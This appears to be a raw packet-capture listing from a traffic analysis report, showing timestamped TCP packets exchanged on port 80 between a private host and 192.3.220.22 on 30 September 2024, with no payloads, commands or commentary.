                                                                            Sep 30, 2024 09:56:14.981378078 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985090017 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985100985 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985111952 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985141039 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985156059 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985667944 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985680103 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985691071 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985701084 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985713005 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985713959 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985723019 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985723972 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985738039 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985739946 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985750914 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985768080 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985773087 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985785961 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985794067 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985797882 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985815048 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985822916 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985824108 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985835075 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985841990 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985846043 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985857964 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985866070 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985869884 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985878944 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985882998 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985891104 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985896111 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985908031 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985915899 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985922098 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985924006 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985930920 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985935926 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985949993 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.985960960 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985960960 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985960960 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985960960 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985975027 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.985982895 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.986120939 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.986136913 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.986148119 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.986159086 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:14.986169100 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.986181021 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:14.986188889 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.023124933 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.023144007 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.023156881 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.023188114 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.023222923 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.066723108 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.066770077 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.066826105 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.066859007 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.066859007 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.066876888 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.066884041 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.066951036 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.066965103 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.066996098 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067022085 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067065001 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067078114 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067114115 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067120075 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067152977 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067162037 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067198038 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067207098 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067254066 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067266941 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067301035 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067311049 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067342997 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067351103 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067404985 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067416906 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067449093 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067461014 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067507029 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067512035 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067543983 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067549944 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067588091 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067595959 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067641020 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067645073 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067678928 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067692041 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067712069 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067722082 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067755938 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067764044 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067807913 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067816019 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067850113 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067861080 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067886114 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067898989 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067922115 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067939997 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067954063 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067969084 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.067989111 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.067998886 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068022966 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068034887 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068058968 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068068027 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068094015 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068100929 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068126917 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068136930 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068176985 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068177938 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068221092 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068231106 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068263054 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068275928 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068306923 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068319082 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068361998 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068368912 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068402052 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068413019 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068434954 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068444014 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068470955 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068470955 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068480015 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068486929 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068531036 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068537951 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068586111 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068587065 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068619967 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068630934 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068653107 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068659067 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068696976 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068701982 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068737030 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068744898 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068769932 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068774939 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068804979 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068813086 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068839073 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068842888 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068873882 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068883896 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068907022 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068917036 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068943024 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068952084 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.068977118 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.068985939 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069011927 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069022894 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069046021 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069052935 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069081068 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069092035 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069114923 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069130898 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069149017 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069161892 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069181919 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069196939 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069222927 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069245100 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069289923 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069295883 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069329023 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069340944 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069365978 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069365978 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069380045 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069417000 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069426060 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069457054 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069464922 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069499016 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069509983 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069535017 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069541931 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069567919 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069578886 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069601059 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069610119 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069634914 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069644928 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069667101 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069669008 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069701910 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069711924 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069735050 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069741011 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069771051 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069778919 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069804907 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069816113 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069839001 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069849014 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069873095 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069889069 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069904089 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069905996 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069922924 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069938898 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069948912 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.069972038 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.069981098 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070004940 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070017099 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070039034 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070048094 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070074081 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070082903 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070111036 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070116043 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070143938 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070153952 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070177078 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070187092 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070209980 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070220947 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070228100 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070242882 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070250988 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070276976 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070287943 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070310116 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070316076 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070350885 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070360899 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070384979 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070394039 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070419073 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070430040 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070453882 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070462942 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070487022 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070498943 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070522070 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070533037 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070555925 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070565939 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070590973 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070601940 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070626020 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070635080 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070661068 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070677042 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070694923 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070707083 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070728064 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070734024 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070763111 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070770979 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070780039 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070795059 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070796013 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070832014 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070841074 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070866108 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070873976 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070899963 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070909977 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070935011 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070941925 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.070971966 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.070977926 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.071016073 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.153628111 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.153711081 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.153753996 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.153794050 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.153857946 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.153918028 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.153918028 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.153922081 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.153966904 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.153985023 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154062986 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154107094 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154131889 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154174089 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154187918 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154217958 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154252052 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154284000 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154308081 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154357910 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154376030 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154441118 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154450893 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154483080 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154525042 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154526949 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154570103 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154592991 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154620886 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154664040 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154671907 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154716015 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154747963 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154783010 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154799938 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154851913 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154855013 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154917002 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.154939890 CEST4917380192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:56:15.154961109 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155004025 CEST8049173192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:56:15.155045033 CEST4917380192.168.2.22192.3.220.22
